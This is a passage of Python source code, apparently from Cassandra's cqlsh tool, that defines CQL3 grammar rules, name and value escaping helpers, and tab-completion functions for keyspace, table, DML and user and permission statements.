'THREE',
'QUORUM',
'ALL',
'LOCAL_QUORUM',
'EACH_QUORUM',
'SERIAL'
)
@classmethod
def escape_value(cls, value):
if value is None:
return 'NULL' # this totally won't work
if isinstance(value, bool):
value = str(value).lower()
elif isinstance(value, float):
return '%f' % value
elif isinstance(value, int):
return str(value)
return "'%s'" % value.replace("'", "''")
@staticmethod
def escape_name(name):
return '"%s"' % name.replace('"', '""')
valid_cql3_word_re = re.compile(r'^[a-z][0-9a-z_]*$')
@classmethod
def is_valid_cql3_name(cls, s):
if s is None:
return False
if s.lower() in cls.keywords - cls.unreserved_keywords:
return False
return cls.valid_cql3_word_re.match(s) is not None
@classmethod
def maybe_escape_name(cls, name):
if cls.is_valid_cql3_name(name):
return name
return cls.escape_name(name)
@staticmethod
def dequote_name(name):
name = name.strip()
if name == '':
return name
if name[0] == '"' and name[-1] == '"':
name = name[1:-1].replace('""', '"')
return name
@staticmethod
def dequote_value(cqlword):
cqlword = cqlword.strip()
if cqlword == '':
return cqlword
if cqlword[0] == "'" and cqlword[-1] == "'":
cqlword = cqlword[1:-1].replace("''", "'")
return cqlword
CqlRuleSet = Cql3ParsingRuleSet()
# convenience for remainder of module
shorthands = ('completer_for', 'explain_completion',
'dequote_value', 'dequote_name',
'escape_value', 'escape_name',
'maybe_escape_name')
for shorthand in shorthands:
globals()[shorthand] = getattr(CqlRuleSet, shorthand)
# BEGIN SYNTAX/COMPLETION RULE DEFINITIONS
syntax_rules = r'''
<Start> ::= <CQL_Statement>*
;
<CQL_Statement> ::= [statements]=<statementBody> ";"
;
# the order of these terminal productions is significant:
<endline> ::= /\n/ ;
JUNK ::= /([ \t\r\f\v]+|(--|[/][/])[^\n\r]*([\n\r]|$)|[/][*].*?[*][/])/ ;
<stringLiteral> ::= /'([^']|'')*'/ ;
<quotedName> ::= /"([^"]|"")*"/ ;
<float> ::= /-?[0-9]+\.[0-9]+/ ;
<uuid> ::= /[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}/ ;
<blobLiteral> ::= /0x[0-9a-f]+/ ;
<wholenumber> ::= /[0-9]+/ ;
<identifier> ::= /[a-z][a-z0-9_]*/ ;
<colon> ::= ":" ;
<star> ::= "*" ;
<endtoken> ::= ";" ;
<op> ::= /[-+=,().]/ ;
<cmp> ::= /[<>]=?/ ;
<brackets> ::= /[][{}]/ ;
<integer> ::= "-"? <wholenumber> ;
<boolean> ::= "true"
| "false"
;
<unclosedString> ::= /'([^']|'')*/ ;
<unclosedName> ::= /"([^"]|"")*/ ;
<unclosedComment> ::= /[/][*].*$/ ;
<term> ::= <stringLiteral>
| <integer>
| <float>
| <uuid>
| <boolean>
| <blobLiteral>
| <functionName> <functionArguments>
;
<functionArguments> ::= "(" ( <term> ( "," <term> )* )? ")"
;
<tokenDefinition> ::= token="TOKEN" "(" <term> ( "," <term> )* ")"
| <term>
;
<value> ::= <term>
| <collectionLiteral>
;
<cident> ::= <quotedName>
| <identifier>
| <unreservedKeyword>
;
<colname> ::= <cident> ; # just an alias
<collectionLiteral> ::= <listLiteral>
| <setLiteral>
| <mapLiteral>
;
<listLiteral> ::= "[" ( <term> ( "," <term> )* )? "]"
;
<setLiteral> ::= "{" ( <term> ( "," <term> )* )? "}"
;
<mapLiteral> ::= "{" <term> ":" <term> ( "," <term> ":" <term> )* "}"
;
<functionName> ::= <identifier>
;
<statementBody> ::= <useStatement>
| <selectStatement>
| <dataChangeStatement>
| <schemaChangeStatement>
| <authenticationStatement>
| <authorizationStatement>
;
<dataChangeStatement> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
| <truncateStatement>
| <batchStatement>
;
<schemaChangeStatement> ::= <createKeyspaceStatement>
| <createColumnFamilyStatement>
| <createIndexStatement>
| <dropKeyspaceStatement>
| <dropColumnFamilyStatement>
| <dropIndexStatement>
| <alterTableStatement>
| <alterKeyspaceStatement>
;
<authenticationStatement> ::= <createUserStatement>
| <alterUserStatement>
| <dropUserStatement>
| <listUsersStatement>
;
<authorizationStatement> ::= <grantStatement>
| <revokeStatement>
| <listPermissionsStatement>
;
# timestamp is included here, since it's also a keyword
<simpleStorageType> ::= typename=( <identifier> | <stringLiteral> | <K_TIMESTAMP> ) ;
<storageType> ::= <simpleStorageType> | <collectionType> ;
<collectionType> ::= "map" "<" <simpleStorageType> "," <simpleStorageType> ">"
| "list" "<" <simpleStorageType> ">"
| "set" "<" <simpleStorageType> ">"
;
<columnFamilyName> ::= ( ksname=<cfOrKsName> dot="." )? cfname=<cfOrKsName> ;
<keyspaceName> ::= ksname=<cfOrKsName> ;
<nonSystemKeyspaceName> ::= ksname=<cfOrKsName> ;
<alterableKeyspaceName> ::= ksname=<cfOrKsName> ;
<cfOrKsName> ::= <identifier>
| <quotedName>
| <unreservedKeyword>;
<unreservedKeyword> ::= nocomplete=
( <K_KEY>
| <K_CLUSTERING>
# | <K_COUNT> -- to get count(*) completion, treat count as reserved
| <K_TTL>
| <K_COMPACT>
| <K_STORAGE>
| <K_TYPE>
| <K_VALUES> )
;
<property> ::= [propname]=<cident> propeq="=" [propval]=<propertyValue>
;
<propertyValue> ::= propsimpleval=( <stringLiteral>
| <identifier>
| <integer>
| <float>
| <unreservedKeyword> )
# we don't use <mapLiteral> here so we can get more targeted
# completions:
| propsimpleval="{" [propmapkey]=<term> ":" [propmapval]=<term>
( ender="," [propmapkey]=<term> ":" [propmapval]=<term> )*
ender="}"
;
'''
def prop_equals_completer(ctxt, cass):
if not working_on_keyspace(ctxt):
# we know if the thing in the property name position is "compact" or
# "clustering" that there won't actually be an equals sign, because
# there are no properties by those names. there are, on the other hand,
# table properties that start with those keywords which don't have
# equals signs at all.
curprop = ctxt.get_binding('propname')[-1].upper()
if curprop in ('COMPACT', 'CLUSTERING'):
return ()
return ['=']
completer_for('property', 'propeq')(prop_equals_completer)
@completer_for('property', 'propname')
def prop_name_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_name_completer(ctxt, cass)
else:
return cf_prop_name_completer(ctxt, cass)
@completer_for('propertyValue', 'propsimpleval')
def prop_val_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_completer(ctxt, cass)
else:
return cf_prop_val_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapkey')
def prop_val_mapkey_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_mapkey_completer(ctxt, cass)
else:
return cf_prop_val_mapkey_completer(ctxt, cass)
@completer_for('propertyValue', 'propmapval')
def prop_val_mapval_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_mapval_completer(ctxt, cass)
else:
return cf_prop_val_mapval_completer(ctxt, cass)
@completer_for('propertyValue', 'ender')
def prop_val_mapender_completer(ctxt, cass):
if working_on_keyspace(ctxt):
return ks_prop_val_mapender_completer(ctxt, cass)
else:
return cf_prop_val_mapender_completer(ctxt, cass)
def ks_prop_name_completer(ctxt, cass):
optsseen = ctxt.get_binding('propname', ())
if 'replication' not in optsseen:
return ['replication']
return ["durable_writes"]
def ks_prop_val_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname == 'durable_writes':
return ["'true'", "'false'"]
if optname == 'replication':
return ["{'class': '"]
return ()
def ks_prop_val_mapkey_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname != 'replication':
return ()
keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
for k, v in zip(keysseen, valsseen):
if k == 'class':
repclass = v
break
else:
return ["'class'"]
if repclass in CqlRuleSet.replication_factor_strategies:
opts = set(('replication_factor',))
elif repclass == 'NetworkTopologyStrategy':
return [Hint('<dc_name>')]
return map(escape_value, opts.difference(keysseen))
def ks_prop_val_mapval_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname != 'replication':
return ()
currentkey = dequote_value(ctxt.get_binding('propmapkey')[-1])
if currentkey == 'class':
return map(escape_value, CqlRuleSet.replication_strategies)
return [Hint('<value>')]
def ks_prop_val_mapender_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
if optname != 'replication':
return [',']
keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
for k, v in zip(keysseen, valsseen):
if k == 'class':
repclass = v
break
else:
return [',']
if repclass in CqlRuleSet.replication_factor_strategies:
if 'replication_factor' not in keysseen:
return [',']
if repclass == 'NetworkTopologyStrategy' and len(keysseen) == 1:
return [',']
return ['}']
def cf_prop_name_completer(ctxt, cass):
return [c[0] for c in (CqlRuleSet.columnfamily_layout_options +
CqlRuleSet.columnfamily_layout_map_options)]
def cf_prop_val_completer(ctxt, cass):
exist_opts = ctxt.get_binding('propname')
this_opt = exist_opts[-1]
if this_opt == 'compression':
return ["{'sstable_compression': '"]
if this_opt == 'compaction':
return ["{'class': '"]
if any(this_opt == opt[0] for opt in CqlRuleSet.obsolete_cf_options):
return ["'<obsolete_option>'"]
if this_opt in ('read_repair_chance', 'bloom_filter_fp_chance',
'dclocal_read_repair_chance'):
return [Hint('<float_between_0_and_1>')]
if this_opt in ('replicate_on_write', 'populate_io_cache_on_flush'):
return ["'yes'", "'no'"]
if this_opt in ('min_compaction_threshold', 'max_compaction_threshold',
'gc_grace_seconds', 'index_interval'):
return [Hint('<integer>')]
return [Hint('<option_value>')]
def cf_prop_val_mapkey_completer(ctxt, cass):
optname = ctxt.get_binding('propname')[-1]
for cql3option, _, subopts in CqlRuleSet.columnfamily_layout_map_options:
if optname == cql3option:
break
else:
return ()
keysseen = map(dequote_value, ctxt.get_binding('propmapkey', ()))
valsseen = map(dequote_value, ctxt.get_binding('propmapval', ()))
pairsseen = dict(zip(keysseen, valsseen))
if optname == 'compression':
return map(escape_value, set(subopts).difference(keysseen))
if optname == 'compaction':
opts = set(subopts)
try:
csc = pairsseen['class']
except KeyError:
return ["'class'"]
csc = csc.split('.')[-1]
if csc == 'SizeTieredCompactionStrategy':
opts.add('min_sstable_size')
opts.add('min_threshold')
opts.add('bucket_high')
opts.add('bucket_low')
opts.add('cold_reads_to_omit')
elif csc == 'LeveledCompactionStrategy':
opts.add('sstable_size_in_mb')
return map(escape_value, opts)
return ()
def cf_prop_val_mapval_completer(ctxt, cass):
opt = ctxt.get_binding('propname')[-1]
key = dequote_value(ctxt.get_binding('propmapkey')[-1])
if opt == 'compaction':
if key == 'class':
return map(escape_value, CqlRuleSet.available_compaction_classes)
return [Hint('<option_value>')]
elif opt == 'compression':
if key == 'sstable_compression':
return map(escape_value, CqlRuleSet.available_compression_classes)
return [Hint('<option_value>')]
return ()
def cf_prop_val_mapender_completer(ctxt, cass):
return [',', '}']
@completer_for('tokenDefinition', 'token')
def token_word_completer(ctxt, cass):
return ['token(']
@completer_for('simpleStorageType', 'typename')
def storagetype_completer(ctxt, cass):
return simple_cql_types
@completer_for('keyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_keyspace_names())
@completer_for('nonSystemKeyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
ksnames = [n for n in cass.get_keyspace_names() if n not in SYSTEM_KEYSPACES]
return map(maybe_escape_name, ksnames)
@completer_for('alterableKeyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
ksnames = [n for n in cass.get_keyspace_names() if n not in NONALTERBALE_KEYSPACES]
return map(maybe_escape_name, ksnames)
@completer_for('columnFamilyName', 'ksname')
def cf_ks_name_completer(ctxt, cass):
return [maybe_escape_name(ks) + '.' for ks in cass.get_keyspace_names()]
@completer_for('columnFamilyName', 'dot')
def cf_ks_dot_completer(ctxt, cass):
name = dequote_name(ctxt.get_binding('ksname'))
if name in cass.get_keyspace_names():
return ['.']
return []
@completer_for('columnFamilyName', 'cfname')
def cf_name_completer(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
try:
cfnames = cass.get_columnfamily_names(ks)
except Exception:
if ks is None:
return ()
raise
return map(maybe_escape_name, cfnames)
@completer_for('unreservedKeyword', 'nocomplete')
def unreserved_keyword_completer(ctxt, cass):
# we never want to provide completions through this production;
# this is always just to allow use of some keywords as column
# names, CF names, property values, etc.
return ()
def get_cf_layout(ctxt, cass):
ks = ctxt.get_binding('ksname', None)
if ks is not None:
ks = dequote_name(ks)
cf = dequote_name(ctxt.get_binding('cfname'))
return cass.get_columnfamily_layout(ks, cf)
def working_on_keyspace(ctxt):
wat = ctxt.get_binding('wat').upper()
if wat in ('KEYSPACE', 'SCHEMA'):
return True
return False
syntax_rules += r'''
<useStatement> ::= "USE" <keyspaceName>
;
<selectStatement> ::= "SELECT" <selectClause>
"FROM" cf=<columnFamilyName>
( "WHERE" <whereClause> )?
( "ORDER" "BY" <orderByClause> ( "," <orderByClause> )* )?
( "LIMIT" limit=<wholenumber> )?
;
<whereClause> ::= <relation> ( "AND" <relation> )*
;
<relation> ::= [rel_lhs]=<cident> ( "=" | "<" | ">" | "<=" | ">=" ) <term>
| token="TOKEN" "(" [rel_tokname]=<cident>
( "," [rel_tokname]=<cident> )*
")" ("=" | "<" | ">" | "<=" | ">=") <tokenDefinition>
| [rel_lhs]=<cident> "IN" "(" <term> ( "," <term> )* ")"
;
<selectClause> ::= "DISTINCT"? <selector> ("AS" <cident>)? ("," <selector> ("AS" <cident>)?)*
| "*"
| "COUNT" "(" star=( "*" | "1" ) ")" ("AS" <cident>)?
;
<selector> ::= [colname]=<cident>
| "WRITETIME" "(" [colname]=<cident> ")"
| "TTL" "(" [colname]=<cident> ")"
| <functionName> <selectionFunctionArguments>
;
<selectionFunctionArguments> ::= "(" ( <selector> ( "," <selector> )* )? ")"
;
<orderByClause> ::= [ordercol]=<cident> ( "ASC" | "DESC" )?
;
'''
@completer_for('orderByClause', 'ordercol')
def select_order_column_completer(ctxt, cass):
prev_order_cols = ctxt.get_binding('ordercol', ())
keyname = ctxt.get_binding('keyname')
if keyname is None:
keyname = ctxt.get_binding('rel_lhs', ())
if not keyname:
return [Hint("Can't ORDER BY here: need to specify partition key in WHERE clause")]
layout = get_cf_layout(ctxt, cass)
order_by_candidates = layout.clustering_key_columns[:]
if len(order_by_candidates) > len(prev_order_cols):
return [maybe_escape_name(order_by_candidates[len(prev_order_cols)])]
return [Hint('No more orderable columns here.')]
@completer_for('relation', 'token')
def relation_token_word_completer(ctxt, cass):
return ['TOKEN(']
@completer_for('relation', 'rel_tokname')
def relation_token_subject_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
return [layout.partition_key_columns[0]]
@completer_for('relation', 'rel_lhs')
def select_relation_lhs_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
filterable = set((layout.partition_key_columns[0], layout.clustering_key_columns[0]))
already_filtered_on = map(dequote_name, ctxt.get_binding('rel_lhs'))
for num in range(1, len(layout.partition_key_columns)):
if layout.partition_key_columns[num - 1] in already_filtered_on:
filterable.add(layout.partition_key_columns[num])
else:
break
for num in range(1, len(layout.clustering_key_columns)):
if layout.clustering_key_columns[num - 1] in already_filtered_on:
filterable.add(layout.clustering_key_columns[num])
else:
break
for cd in layout.columns:
if cd.index_name is not None:
filterable.add(cd.name)
return map(maybe_escape_name, filterable)
@completer_for('selectClause', 'star')
def select_count_star_completer(ctxt, cass):
return ['*']
explain_completion('selector', 'colname')
syntax_rules += r'''
<insertStatement> ::= "INSERT" "INTO" cf=<columnFamilyName>
"(" [colname]=<cident> "," [colname]=<cident>
( "," [colname]=<cident> )* ")"
"VALUES" "(" [newval]=<value> valcomma="," [newval]=<value>
( valcomma="," [newval]=<value> )* valcomma=")"
( "USING" [insertopt]=<usingOption>
( "AND" [insertopt]=<usingOption> )* )?
;
<usingOption> ::= "TIMESTAMP" <wholenumber>
| "TTL" <wholenumber>
;
'''
@completer_for('insertStatement', 'colname')
def insert_colname_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
colnames = set(map(dequote_name, ctxt.get_binding('colname', ())))
keycols = layout.primary_key_columns
for k in keycols:
if k not in colnames:
return [maybe_escape_name(k)]
normalcols = set(layout.regular_columns) - colnames
return map(maybe_escape_name, normalcols)
@completer_for('insertStatement', 'newval')
def insert_newval_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
insertcols = map(dequote_name, ctxt.get_binding('colname'))
valuesdone = ctxt.get_binding('newval', ())
if len(valuesdone) >= len(insertcols):
return []
curcol = insertcols[len(valuesdone)]
cqltype = layout.get_column(curcol).cqltype
coltype = cqltype.typename
if coltype in ('map', 'set'):
return ['{']
if coltype == 'list':
return ['[']
if coltype == 'boolean':
return ['true', 'false']
return [Hint('<value for %s (%s)>' % (maybe_escape_name(curcol),
cqltype.cql_parameterized_type()))]
@completer_for('insertStatement', 'valcomma')
def insert_valcomma_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
numcols = len(ctxt.get_binding('colname', ()))
numvals = len(ctxt.get_binding('newval', ()))
if numcols > numvals:
return [',']
return [')']
@completer_for('insertStatement', 'insertopt')
def insert_option_completer(ctxt, cass):
opts = set('TIMESTAMP TTL'.split())
for opt in ctxt.get_binding('insertopt', ()):
opts.discard(opt.split()[0])
return opts
syntax_rules += r'''
<updateStatement> ::= "UPDATE" cf=<columnFamilyName>
( "USING" [updateopt]=<usingOption>
( "AND" [updateopt]=<usingOption> )* )?
"SET" <assignment> ( "," <assignment> )*
"WHERE" <whereClause>
;
<assignment> ::= updatecol=<cident>
( "=" update_rhs=( <value> | <cident> )
( counterop=( "+" | "-" ) inc=<wholenumber>
| listadder="+" listcol=<cident> )
| indexbracket="[" <term> "]" "=" <term> )
;
'''
@completer_for('updateStatement', 'updateopt')
def insert_option_completer(ctxt, cass):
opts = set('TIMESTAMP TTL'.split())
for opt in ctxt.get_binding('updateopt', ()):
opts.discard(opt.split()[0])
return opts
@completer_for('assignment', 'updatecol')
def update_col_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
return map(maybe_escape_name, layout.regular_columns)
@completer_for('assignment', 'update_rhs')
def update_countername_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
cqltype = layout.get_column(curcol).cqltype
coltype = cqltype.typename
if coltype == 'counter':
return [maybe_escape_name(curcol)]
if coltype in ('map', 'set'):
return ["{"]
if coltype == 'list':
return ["["]
return [Hint('<term (%s)>' % cqltype.cql_parameterized_type())]
@completer_for('assignment', 'counterop')
def update_counterop_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
return ['+', '-'] if layout.is_counter_col(curcol) else []
@completer_for('assignment', 'inc')
def update_counter_inc_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
if layout.is_counter_col(curcol):
return [Hint('<wholenumber>')]
return []
@completer_for('assignment', 'listadder')
def update_listadder_completer(ctxt, cass):
rhs = ctxt.get_binding('update_rhs')
if rhs.startswith('['):
return ['+']
return []
@completer_for('assignment', 'listcol')
def update_listcol_completer(ctxt, cass):
rhs = ctxt.get_binding('update_rhs')
if rhs.startswith('['):
colname = dequote_name(ctxt.get_binding('updatecol'))
return [maybe_escape_name(colname)]
return []
@completer_for('assignment', 'indexbracket')
def update_indexbracket_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
curcol = dequote_name(ctxt.get_binding('updatecol', ''))
coltype = layout.get_column(curcol).cqltype.typename
if coltype in ('map', 'list'):
return ['[']
return []
syntax_rules += r'''
<deleteStatement> ::= "DELETE" ( <deleteSelector> ( "," <deleteSelector> )* )?
"FROM" cf=<columnFamilyName>
( "USING" [delopt]=<deleteOption> )?
"WHERE" <whereClause>
;
<deleteSelector> ::= delcol=<cident> ( memberbracket="[" memberselector=<term> "]" )?
;
<deleteOption> ::= "TIMESTAMP" <wholenumber>
;
'''
@completer_for('deleteStatement', 'delopt')
def delete_opt_completer(ctxt, cass):
opts = set('TIMESTAMP'.split())
for opt in ctxt.get_binding('delopt', ()):
opts.discard(opt.split()[0])
return opts
@completer_for('deleteSelector', 'delcol')
def delete_delcol_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
return map(maybe_escape_name, layout.regular_columns)
syntax_rules += r'''
<batchStatement> ::= "BEGIN" ( "UNLOGGED" | "COUNTER" )? "BATCH"
( "USING" [batchopt]=<usingOption>
( "AND" [batchopt]=<usingOption> )* )?
[batchstmt]=<batchStatementMember> ";"?
( [batchstmt]=<batchStatementMember> ";"? )*
"APPLY" "BATCH"
;
<batchStatementMember> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
;
'''
@completer_for('batchStatement', 'batchopt')
def batch_opt_completer(ctxt, cass):
opts = set('TIMESTAMP'.split())
for opt in ctxt.get_binding('batchopt', ()):
opts.discard(opt.split()[0])
return opts
syntax_rules += r'''
<truncateStatement> ::= "TRUNCATE" cf=<columnFamilyName>
;
'''
syntax_rules += r'''
<createKeyspaceStatement> ::= "CREATE" wat=( "KEYSPACE" | "SCHEMA" ) ("IF" "NOT" "EXISTS")? ksname=<cfOrKsName>
"WITH" <property> ( "AND" <property> )*
;
'''
@completer_for('createKeyspaceStatement', 'wat')
def create_ks_wat_completer(ctxt, cass):
# would prefer to get rid of the "schema" nomenclature in cql3
if ctxt.get_binding('partial', '') == '':
return ['KEYSPACE']
return ['KEYSPACE', 'SCHEMA']
syntax_rules += r'''
<createColumnFamilyStatement> ::= "CREATE" wat=( "COLUMNFAMILY" | "TABLE" ) ("IF" "NOT" "EXISTS")?
( ks=<nonSystemKeyspaceName> dot="." )? cf=<cfOrKsName>
"(" ( <singleKeyCfSpec> | <compositeKeyCfSpec> ) ")"
( "WITH" <cfamProperty> ( "AND" <cfamProperty> )* )?
;
<cfamProperty> ::= <property>
| "COMPACT" "STORAGE"
| "CLUSTERING" "ORDER" "BY" "(" <cfamOrdering>
( "," <cfamOrdering> )* ")"
;
<cfamOrdering> ::= [ordercol]=<cident> ( "ASC" | "DESC" )
;
<singleKeyCfSpec> ::= [newcolname]=<cident> <simpleStorageType> "PRIMARY" "KEY"
( "," [newcolname]=<cident> <storageType> )*
;
<compositeKeyCfSpec> ::= [newcolname]=<cident> <simpleStorageType>
"," [newcolname]=<cident> <storageType> ( "static" )?
( "," [newcolname]=<cident> <storageType> ( "static" )? )*
"," "PRIMARY" k="KEY" p="(" ( partkey=<pkDef> | [pkey]=<cident> )
( c="," [pkey]=<cident> )* ")"
;
<pkDef> ::= "(" [ptkey]=<cident> "," [ptkey]=<cident>
( "," [ptkey]=<cident> )* ")"
;
'''
@completer_for('cfamOrdering', 'ordercol')
def create_cf_clustering_order_colname_completer(ctxt, cass):
colnames = map(dequote_name, ctxt.get_binding('newcolname', ()))
# Definitely some of these aren't valid for ordering, but I'm not sure
# precisely which are. This is good enough for now
return colnames
@completer_for('createColumnFamilyStatement', 'wat')
def create_cf_wat_completer(ctxt, cass):
# would prefer to get rid of the "columnfamily" nomenclature in cql3
if ctxt.get_binding('partial', '') == '':
return ['TABLE']
return ['TABLE', 'COLUMNFAMILY']
explain_completion('createColumnFamilyStatement', 'cf', '<new_table_name>')
explain_completion('compositeKeyCfSpec', 'newcolname', '<new_column_name>')
@completer_for('createColumnFamilyStatement', 'dot')
def create_cf_ks_dot_completer(ctxt, cass):
ks = dequote_name(ctxt.get_binding('ks'))
if ks in cass.get_keyspace_names():
return ['.']
return []
@completer_for('pkDef', 'ptkey')
def create_cf_pkdef_declaration_completer(ctxt, cass):
cols_declared = ctxt.get_binding('newcolname')
pieces_already = ctxt.get_binding('ptkey', ())
pieces_already = map(dequote_name, pieces_already)
while cols_declared[0] in pieces_already:
cols_declared = cols_declared[1:]
if len(cols_declared) < 2:
return ()
return [maybe_escape_name(cols_declared[0])]
@completer_for('compositeKeyCfSpec', 'pkey')
def create_cf_composite_key_declaration_completer(ctxt, cass):
cols_declared = ctxt.get_binding('newcolname')
pieces_already = ctxt.get_binding('ptkey', ()) + ctxt.get_binding('pkey', ())
pieces_already = map(dequote_name, pieces_already)
while cols_declared[0] in pieces_already:
cols_declared = cols_declared[1:]
if len(cols_declared) < 2:
return ()
return [maybe_escape_name(cols_declared[0])]
@completer_for('compositeKeyCfSpec', 'k')
def create_cf_composite_primary_key_keyword_completer(ctxt, cass):
return ['KEY (']
@completer_for('compositeKeyCfSpec', 'p')
def create_cf_composite_primary_key_paren_completer(ctxt, cass):
return ['(']
@completer_for('compositeKeyCfSpec', 'c')
def create_cf_composite_primary_key_comma_completer(ctxt, cass):
cols_declared = ctxt.get_binding('newcolname')
pieces_already = ctxt.get_binding('pkey', ())
if len(pieces_already) >= len(cols_declared) - 1:
return ()
return [',']
syntax_rules += r'''
<createIndexStatement> ::= "CREATE" "CUSTOM"? "INDEX" ("IF" "NOT" "EXISTS")? indexname=<identifier>? "ON"
cf=<columnFamilyName> "(" col=<cident> ")"
( "USING" <stringLiteral> ( "WITH" "OPTIONS" "=" <mapLiteral> )? )?
;
'''
explain_completion('createIndexStatement', 'indexname', '<new_index_name>')
@completer_for('createIndexStatement', 'col')
def create_index_col_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
colnames = [cd.name for cd in layout.columns if cd.index_name is None]
return map(maybe_escape_name, colnames)
syntax_rules += r'''
<dropKeyspaceStatement> ::= "DROP" "KEYSPACE" ("IF" "EXISTS")? ksname=<nonSystemKeyspaceName>
;
<dropColumnFamilyStatement> ::= "DROP" ( "COLUMNFAMILY" | "TABLE" ) ("IF" "EXISTS")? cf=<columnFamilyName>
;
<dropIndexStatement> ::= "DROP" "INDEX" ("IF" "EXISTS")? indexname=<identifier>
;
'''
@completer_for('dropIndexStatement', 'indexname')
def drop_index_completer(ctxt, cass):
return map(maybe_escape_name, cass.get_index_names())
syntax_rules += r'''
<alterTableStatement> ::= "ALTER" wat=( "COLUMNFAMILY" | "TABLE" ) cf=<columnFamilyName>
<alterInstructions>
;
<alterInstructions> ::= "ALTER" existcol=<cident> "TYPE" <storageType>
| "ADD" newcol=<cident> <storageType> ("static")?
| "DROP" existcol=<cident>
| "WITH" <cfamProperty> ( "AND" <cfamProperty> )*
| "RENAME" existcol=<cident> "TO" newcol=<cident>
( "AND" existcol=<cident> "TO" newcol=<cident> )*
;
'''
@completer_for('alterInstructions', 'existcol')
def alter_table_col_completer(ctxt, cass):
layout = get_cf_layout(ctxt, cass)
cols = [md.name for md in layout.columns]
return map(maybe_escape_name, cols)
explain_completion('alterInstructions', 'newcol', '<new_column_name>')
syntax_rules += r'''
<alterKeyspaceStatement> ::= "ALTER" ( "KEYSPACE" | "SCHEMA" ) ks=<alterableKeyspaceName>
"WITH" <property> ( "AND" <property> )*
;
'''
syntax_rules += r'''
<username> ::= name=( <identifier> | <stringLiteral> )
;
<createUserStatement> ::= "CREATE" "USER" <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<alterUserStatement> ::= "ALTER" "USER" <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<dropUserStatement> ::= "DROP" "USER" <username>
;
<listUsersStatement> ::= "LIST" "USERS"
;
'''
syntax_rules += r'''
<grantStatement> ::= "GRANT" <permissionExpr> "ON" <resource> "TO" <username>
;
<revokeStatement> ::= "REVOKE" <permissionExpr> "ON" <resource> "FROM" <username>
;
<listPermissionsStatement> ::= "LIST" <permissionExpr>
( "ON" <resource> )? ( "OF" <username> )? "NORECURSIVE"?
;
<permission> ::= "AUTHORIZE"
| "CREATE"
| "ALTER"
| "DROP"
| "SELECT"
| "MODIFY"
;
<permissionExpr> ::= ( <permission> "PERMISSION"? )
| ( "ALL" "PERMISSIONS"? )
;
<resource> ::= <dataResource>
;
<dataResource> ::= ( "ALL" "KEYSPACES" )
| ( "KEYSPACE" <keyspaceName> )
| ( "TABLE"? <columnFamilyName> )
;
'''
@completer_for('username', 'name')
def username_name_completer(ctxt, cass):
def maybe_quote(name):
if CqlRuleSet.is_valid_cql3_name(name):
return name
return "'%s'" % name
# disable completion for CREATE USER.
if ctxt.matched[0][0] == 'K_CREATE':
return [Hint('<username>')]
cursor = cass.conn.cursor()
cursor.execute("LIST USERS")
return [maybe_quote(row[0].replace("'", "''")) for row in cursor.fetchall()]
# END SYNTAX/COMPLETION RULE DEFINITIONS
CqlRuleSet.append_rules(syntax_rules)
class CqlColumnDef:
index_name = None
index_type = None
component_type = 'regular'
component_index = None
index_options = {}
def __init__(self, name, cqltype):
self.name = name
self.cqltype = cqltype
assert name is not None
@classmethod
def from_layout(cls, layout):
c = cls(layout[u'column_name'], lookup_casstype(layout[u'validator']))
c.component_type = layout[u'type']
idx = layout[u'component_index'] # can be None
if idx:
c.component_index = int(idx)
c.index_name = layout[u'index_name']
c.index_type = layout[u'index_type']
if c.index_type == 'CUSTOM':
c.index_options = json.loads(layout[u'index_options'])
return c
def is_static(self):
return self.component_type == 'static'
def __str__(self):
indexstr = ' (index %s)' % self.index_name if self.index_name is not None else ''
return '<CqlColumnDef %r %r%s>' % (self.name, self.cqltype, indexstr)
__repr__ = __str__
class CqlTableDef:
"""Names of all columns which are grouped into the partition key"""
partition_key_columns = ()
"""Names of all columns which are part of the primary key, but not grouped
into the partition key"""
clustering_key_columns = ()
"""Names of all columns which are part of the primary key, whether or not
they are grouped into the partition key"""
primary_key_columns = ()
"""Names of all columns which aren't part of the primary key"""
regular_columns = ()
"""CqlColumnDef objects for all columns. Use .get_column() to access one
by name."""
columns = ()
def __init__(self, name):
self.name = name
@classmethod
def from_layout(cls, layout, coldefs):
"""
